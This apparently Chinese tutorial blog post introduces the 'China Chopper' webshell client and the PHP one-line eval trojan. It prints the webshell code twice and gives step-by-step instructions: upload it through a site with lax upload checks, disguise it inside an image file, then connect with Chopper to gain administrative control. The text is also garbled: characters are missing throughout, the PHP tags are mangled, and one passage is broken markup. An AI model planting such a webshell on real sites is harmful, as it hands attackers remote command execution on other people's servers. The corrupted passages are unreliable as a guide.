菜刀和一句话木马

中国菜刀,一个非常好用而又强大的webshell

webshell就是以asp、php、jsp或者cgi等 页文件形式存在的一种命令执行环境,也可以将其称做为一种 页后门。
在博主本人看来,对于一名 安小白来说,这段解释对理解webshell没有丝毫帮助。webshell:web: 站 shell:命令语言。执行用户输入的命令或者说执行预先设定好的一连串的命令
也就是一种具有命令效果的 页代码,最直白的说,你在代码里写的,就是你想让 页呈现的。
整体的意思可以理解为:具有命令功能的 页代码。

什么是 页后门页后门其实就是一段 页代码,主要以ASP和PHP代码(ASP:动态服务器页面
PHP:一种在服务器端执行的嵌入HTML文档的脚本语言
)为主。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行某些危险的操作,获得某些敏感的技术信息或者通过渗透,提权获得服务器的控制权

什么是 页代码:所谓的 页代码,就是指在 页制作过程中需要用到的一些特殊的“语言”,设计人员通过对这些“语言”进行组织编排制作出 页,然后由浏览器对代码进行“翻译”后才是我们最终看到的效果。

<hp @eval($_POST[‘cmd’]);gt;

@:php的抑制 错继续执行的符 。(也就是说当执行这段木马时,编译器编译结果是错误的,系统也不会 错。
eval():将字符串当成可执行的脚本执行的一个函数,PHP脚本中类似的函数有很多,不止ebal()这一个可执行字符串函数。
P O S T [ ′ c m d ′ ] : 取 P O S T 方 式 传 名 为 ′ c m d ′ 的 参 数 的 值 。 ( 因 为 隐 蔽 且 传 输 量 大 , 一 般 工 具 都 是 P O S T 方 式 传 参 , 所 以 一 句 话 一 般 写 _POST[&#x27;cmd&#x27;]:取POST方式传名为&#x27;cmd&#x27;的参数的值。(因为隐蔽且传输量大,一般工具都是POST方式传参,所以一句话一般写 P/span>OST[cmd]:POSTcmdPOST_POST)
把这个一句话木马挂到一个 页上,用‘菜刀’连接这一句话木马,一旦它运行,凭借这一句话木马就可以获取 站的管理权限。

寻找到上传点,上传一句话木马。
寻找一个 页开发者没有对上传文件做过多限制的 站。将一句话代码上传。
为了增加上传成功的记录,通常情况下,可以选择将一句话木马隐藏在图片里之后再上传。原因是现状大多数 站很少存在类似的低级错误。
1。新建一个asp

一句话木马:

<hp @eval($_POST[‘cmd’]); gt;

菜刀和一句话木马
添加完成后将产生一条新记录,右键点击链接,可选择相应的操作项。

建议在进行菜刀连接一句话木马的操作时在影子模式下操作,因为大多数在 上下载的菜刀都存在后门,在影子模式下进行相关操作也能保证安全。同时建议深入了解一句话的原理。如果只知道攻击方法却不明其所以然就仅仅是一个只会攻击不会防御的脚本小子。也不提倡违法行为。

声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!

上一篇 2019年4月1日
下一篇 2019年4月2日

相关推荐